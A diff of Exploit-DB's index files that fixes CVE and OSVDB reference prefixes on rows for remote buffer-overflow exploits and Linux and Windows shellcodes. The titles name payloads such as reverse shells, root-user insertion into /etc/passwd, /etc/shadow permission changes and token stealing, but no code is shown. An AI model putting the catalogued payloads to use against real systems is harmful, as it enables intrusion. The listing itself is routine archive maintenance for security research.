+43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,,2017-12-29,2022-11-11,0,CVE-2017-17968,,,,http://www.exploit-db.comNXSetup_x86.zip,
 16439,exploits/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-10,1,OSVDB-61435,"Metasploit Framework (MSF)",,,,
 10911,exploits/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,remote,windows,,2010-01-01,2017-11-15,1,OSVDB-61435,,,,http://www.exploit-db.comNXSetup_Vista_x86_.zip,
 19895,exploits/windows/remote/19895.txt,"NetWin DNews 5.3 Server - Remote Buffer Overflow",2000-03-01,Joey__,remote,windows,,2000-03-01,2012-07-22,1,OSVDB-13683;CVE-2000-0423,,,,,https://www.securityfocus.com/bid/1172/info

files_shellcodes.csv

@@ -199,13 +199,13 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",,linux_mips,55,2015-03-05,2017-08-22,0,,,,,,
 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,,linux_mips,56,2005-11-08,2018-01-12,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-79.php
 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",,linux_mips,200,2013-11-08,2016-09-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-860.php
-27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",,linux_mips,80,2013-07-27,2018-01-12,0,2013-4659;95778,,,,,
+27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",,linux_mips,80,2013-07-27,2018-01-12,0,CVE-2013-4659;OSVDB-95778,,,,,
 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,,linux_mips,164,2011-11-27,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-793.php
 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,,linux_mips,36,2015-02-03,2019-03-07,0,,,,http://www.exploit-db.com/screenshots/idlt36000/download-attachment.png,,
 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,,linux_mips,48,2011-11-27,2011-11-27,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-792.php
 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,,linux_mips,52,2011-10-07,2018-01-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-782.php
 50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",2022-02-18,"Marco Ivaldi",,linux_mips,,2022-02-18,2022-02-18,0,,,,,,
-18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,,linux_mips,32,2011-12-10,2011-12-10,0,83189,,,,,http://shell-storm.org/shellcode/files/shellcode-795.php
+18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,,linux_mips,32,2011-12-10,2011-12-10,0,OSVDB-83189,,,,,http://shell-storm.org/shellcode/files/shellcode-795.php
 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,,linux_mips,168,2011-12-10,2011-12-10,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-794.php
 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,,linux_mips,,2018-08-29,2018-08-29,0,,,,,,
 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,,linux_ppc,112,2004-09-11,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-89.php
@@ -461,7 +461,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",,linux_x86,29,2019-01-29,2019-01-29,0,,,,,,
 13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,,linux_x86,50,2004-09-11,,1,,,,,,
 42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,,linux_x86,66,2017-06-15,2017-07-04,0,,,,,,
-34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,,linux_x86,50,2014-07-22,2017-08-23,1,2014-4943;109277,,,,,http://shell-storm.org/shellcode/files/shellcode-881.php
+34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,,linux_x86,50,2014-07-22,2017-08-23,1,CVE-2014-4943;OSVDB-109277,,,,,http://shell-storm.org/shellcode/files/shellcode-881.php
 13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,,linux_x86,21,2005-09-14,2018-01-17,1,,,,,,
 13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,,linux_x86,23,2005-09-03,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-236.php
 13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,,linux_x86,27,2005-08-24,,1,,,,,,
@@ -678,7 +678,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,,linux_x86,,2011-12-31,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-798.php
 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,,linux_x86,79,2008-08-17,2018-01-16,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-222.php
 13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,,linux_x86,39,2010-05-31,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-631.php
-13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",,linux_x86,37,2006-04-02,2018-01-16,1,65252,,,,,http://shell-storm.org/shellcode/files/shellcode-251.php
+13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",,linux_x86,37,2006-04-02,2018-01-16,1,OSVDB-65252,,,,,http://shell-storm.org/shellcode/files/shellcode-251.php
 43652,shellcodes/linux_x86/43652.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)",2009-06-23,TheWorm,,linux_x86,33,2018-01-16,2018-01-16,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-473.php
 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",,linux_x86,114,2018-01-18,2018-01-18,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-868.php
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)",2019-05-06,strider,,linux_x86,72,2019-05-06,2019-05-23,0,,,,,,
@@ -1028,7 +1028,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - WinExec Calc.exe +  Null-Free Shellcode (195 bytes)",2020-02-24,boku,,windows_x86,,2020-02-24,2020-03-23,0,,,,,,
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
-14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
+14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,